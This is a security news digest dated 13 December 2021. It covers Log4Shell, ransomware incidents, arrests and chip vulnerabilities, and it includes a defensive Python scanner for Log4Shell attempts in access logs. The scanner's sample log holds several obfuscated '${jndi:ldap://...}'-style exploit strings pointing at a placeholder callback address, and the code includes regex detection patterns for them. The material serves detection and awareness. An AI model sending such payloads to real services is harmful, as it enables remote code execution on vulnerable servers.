Daily NCSC-FI news followup 2021-12-13

Log4j alert raised to red: one of the most significant vulnerabilities

www.kyberturvallisuuskeskus.fi/fi/varo_ttn2_5/2021 The yellow alert published on 10 Dec 2021 has been changed to red now that the severity of the vulnerability has become clearer. New cases of exploitation of the vulnerable Log4j component, which is extremely widely used in Internet services, are being observed continuously. Administrators are required to react quickly. In this article we also answer frequently asked questions on the topic.

A vulnerability that affects practically every user was found on the Internet; the number of exploitation attempts exploded over the weekend

www.hs.fi/talous/art-2000008472050.html Security researchers last week reported a vulnerability found in the Log4j component of the Apache Foundation, which provides open-source software. The number of exploitation attempts related to the vulnerability grew explosively over the weekend, says the National Cyber Security Centre Finland (NCSC-FI) at the Finnish Transport and Communications Agency Traficom. "A fairly good summary of the situation is that the Internet is on fire and an ordinary citizen cannot do anything about it," says Juho Jauhiainen, information security specialist at the centre.

The severity of the Java hole became clear: "The Internet is on fire"

www.tivi.fi/uutiset/java-aukon-vakavuus-kirkastui-internet-on-tulessa/5155b7b1-57d2-4b4b-8b09-318b50de6c35 One small snippet of text: copy it, paste it in the right place, and you are done. The recently disclosed zero-day vulnerability, which has been named Log4Shell, is like a master key to the Internet. It affects millions of companies, and exploiting it is so easy that even a grandmother from Pihtipudas could use it to break into a server remotely without logging in to the system. also:

www.is.fi/digitoday/tietoturva/art-2000008471124.html also:

www.iltalehti.fi/tietoturva/a/9408b302-744c-4afa-9b17-6d3f881ba470

log4shell – Quick Guide

musana.net/2021/12/13/log4shell-Quick-Guide/

Log4Shell explained how it works, why you need to know, and how to fix it

nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/

Ten families of malicious samples are spreading using the Log4j2 vulnerability Now

blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now/ Over the past 2 days, we have captured samples from other families, and now the list of families has exceeded 10. It looks like the race between the offense and defense has started, and the offense side is wasting no time to jump into the game.

log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228

research.nccgroup.com/2021/12/12/log4j-jndi-be-gone-a-simple-mitigation-for-cve-2021-44228/ In this post, we first offer some context on the vulnerability, the released fixes (and their shortcomings), and finally our mitigation (or you can skip directly to our mitigation tool here).
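The Log4Shell items above describe the attack as pasting a single lookup string into any field that ends up in a log. The scanner below is an added example for this digest, not code from any of the linked articles and not NCC Group's log4j-jndi-be-gone agent: it collapses the nested-lookup tricks attackers use to hide the literal `${jndi:` prefix and reports the JNDI URI scheme per access-log line. The sample log lines and the 198.51.100.10 callback address are constructed for the demonstration, and the set of inner lookups it unwraps (`${lower:}`, `${upper:}`, and default-value forms such as `${::-j}` and `${env:X:-j}`) is an assumption about common obfuscations, not an exhaustive list.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample: Apache/nginx-style access log lines, the last field being
# the User-Agent header, which many Log4j-backed services log verbatim.
# 198.51.100.10 is a documentation address standing in for the attacker's host.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Dec/2021:10:01:02 +0200] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [13/Dec/2021:10:01:05 +0200] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.10:1389/a}"
10.0.0.9 - - [13/Dec/2021:10:01:09 +0200] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.10:1389/b} HTTP/1.1" 404 0 "-" "curl/7.68"
10.0.0.11 - - [13/Dec/2021:10:01:12 +0200] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.10:1099/c}"
10.0.0.13 - - [13/Dec/2021:10:01:15 +0200] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:dns://198.51.100.10/d}"
10.0.0.15 - - [13/Dec/2021:10:01:20 +0200] "GET /docs/log4j-jndi-lookup.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Inner lookups that Log4j 2.x resolves before the outer ${...} is evaluated.
# Attackers nest them so the string "${jndi:" never appears on the wire.
# Covered forms (an assumption about common variants, not an exhaustive list):
#   ${lower:J} / ${upper:j}       -> j   (case lookups)
#   ${::-j}                       -> j   (empty key, default value after ":-")
#   ${env:NaN:-j} / ${sys:NaN:-j} -> j   (missing variable, default value)
_INNER = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"
    r"|\$\{(?:[a-z]*:)?[^${}:]*:-([^${}]*)\}",
    re.IGNORECASE,
)

# The outer JNDI lookup; the group captures the URI scheme (ldap, ldaps, rmi, dns, iiop, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups inside-out until nothing changes.

    The regexes refuse to match across a nested '${', so each pass resolves the
    innermost layer and a bounded loop reaches the fixed point. Case lookups are
    replaced by their literal argument rather than actually re-cased, because
    Log4j matches the lookup prefix case-insensitively anyway.
    """
    for _ in range(max_rounds):
        new = _INNER.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
        if new == text:
            break
        text = new
    return text


def find_jndi(line: str) -> Optional[str]:
    """Return the lowercase JNDI URI scheme if the line carries a lookup, else None."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(log_text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, client_ip, scheme) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        scheme = find_jndi(line)
        if scheme:
            hits.append((n, line.split()[0], scheme))
    return hits


if __name__ == "__main__":
    for n, ip, scheme in scan(SAMPLE_LOG):
        print(f"line {n}: {ip} sent a JNDI lookup via {scheme}")
```

A hit means an attempt was logged, not that the lookup resolved: the same string in a field that is never passed to a vulnerable Log4j 2 instance does nothing. Conversely, the payload can arrive in any logged value (other headers, form fields, usernames), so run the scanner over every log source the application writes, not only the access log, and treat the unwrapping rules as a starting point to extend as new variants appear.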

Bitcoin scammers take millions and personal data from their victims; a Finn may unknowingly end up involved even with a drug cartel

yle.fi/uutiset/3-12225404 The scammers took almost one hundred thousand euros from Jarmo. The MOT editorial team started investigating the case and ended up on the trail of an enormous scam factory.

Diavol Ransomware

thedfirreport.com/2021/12/13/diavol-ransomware/ The malware (BazarLoader) was delivered to an endpoint via email, which included a link to OneDrive. The OneDrive link directed the user to download a zip file, which contained an ISO. Once opened (mounted) on the user's system, the ISO was found to contain an LNK file and a DLL. The LNK file masqueraded as a document, enticing the user to click/open it. Once the user executed the LNK file, the BazarLoader infection was initiated. Around 42 hours after the initial intrusion, the threat actors pushed towards completion of their final objective: RDP access was established from the central file server they had compromised to all endpoints, and a batch script named "kill.bat" was executed on all of the targeted machines.

Karakurt rises from its lair

www.accenture.com/us-en/blogs/cyber-defense/karakurt-threat-mitigation Accenture Security has identified a new threat group, the self-proclaimed Karakurt Hacking Team, that has impacted over 40 victims across multiple geographies. The threat group is financially motivated, opportunistic in nature, and so far, appears to target smaller companies or corporate subsidiaries versus the alternative big game hunting approach. Based on intrusion analysis to date, the threat group focuses solely on data exfiltration and subsequent extortion, rather than the more destructive ransomware deployment. In addition, Accenture Security assesses with moderate-to-high confidence that the threat group’s extortion approach includes steps to avoid, as much as possible, drawing attention to its activities.

Cyber-attack on Hellmann Worldwide Logistics

www.infosecurity-magazine.com/news/cyberattack-on-hellmann-worldwide/ A cyber-attack has been carried out against major German logistics provider Hellmann Worldwide Logistics. Hellmann said that since the attack was discovered, it has been under the constant observation of its Global Crisis Taskforce, which is analyzing the incident. The company has also hired “external renowned security specialists” to investigate the attack. Hellmann did not disclose the exact nature of the attack, which is still under investigation.

Kronos ransomware attack may cause weeks of HR solutions downtime

www.bleepingcomputer.com/news/security/kronos-ransomware-attack-may-cause-weeks-of-hr-solutions-downtime/ Workforce management solutions provider Kronos has suffered a ransomware attack that will likely disrupt many of its cloud-based solutions for weeks. Kronos is a workforce management and human resources provider whose cloud-based solutions cover timekeeping, payroll, employee benefits, analytics, and more. In 2020, Kronos merged with Ultimate Software to create a new company named UKG. Kronos' software is used by many companies, including car manufacturers, education institutions, and local governments. Customers using Kronos include Tesla, Temple University, Community Bank, and the San Francisco Municipal Transit Authority. also:

community.kronos.com/s/feed/0D54M00004wJKHiSAO?language=en_US

A Look Into Purple Fox’s Server Infrastructure

www.trendmicro.com/en_us/research/21/l/a-look-into-purple-fox-server-infrastructure.html By examining Purple Fox’s routines and activities, both with our initial research and the subject matter we cover in this blog post, we hope to help incident responders, security operation centers (SOCs), and security researchers find and weed out Purple Fox infections in their network.

Ransomware affiliate arrested in Romania

therecord.media/ransomware-affiliate-arrested-in-romania/ Romanian police have detained a 41-year-old suspect today in the city of Craiova on suspicion of participating in ransomware attacks across the globe. He is believed to be a so-called "ransomware affiliate," a term used to describe cyber-criminals who rent access to ransomware, hack into corporate networks, and then deploy it against their targets.

Ukraine arrests 51 for selling data of 300 million people in US, EU

www.bleepingcomputer.com/news/security/ukraine-arrests-51-for-selling-data-of-300-million-people-in-us-eu/ Ukrainian law enforcement arrested 51 suspects believed to have been selling stolen personal data on hacking forums belonging to hundreds of millions worldwide, including Ukraine, the US, and Europe. "As a result of the operation, about 100 databases of personal data relevant for 2020-2021 were seized," the Cyberpolice Department of the National Police of Ukraine said. "The seized databases contained information on more than 300 million citizens of Ukraine, Europe and the United States."

Intel adds payout bonuses as it migrates bug bounty program to Intigriti

portswigger.net/daily-swig/intel-adds-payout-bonuses-as-it-migrates-bug-bounty-program-to-intigriti Intel is applying a 12-month bonus incentive to bug bounty rewards on select lines of hardware and firmware, which lifts the payout ceiling for the most critical bugs from $100,000 to $150,000.

Bugs in billions of WiFi, Bluetooth chips allow password, data theft

www.bleepingcomputer.com/news/security/bugs-in-billions-of-wifi-bluetooth-chips-allow-password-data-theft/ Researchers at the University of Darmstadt, the University of Brescia, CNIT, and the Secure Mobile Networking Lab have published a paper showing that it is possible to extract passwords and manipulate traffic on a WiFi chip by targeting a device's Bluetooth component, exploiting the shared resources of combo chips. In their paper, the researchers explain how they could perform over-the-air (OTA) denial of service and code execution, extract network passwords, and read sensitive data on chipsets from Broadcom, Cypress, and Silicon Labs. Research paper (PDF): arxiv.org/pdf/2112.05719.pdf
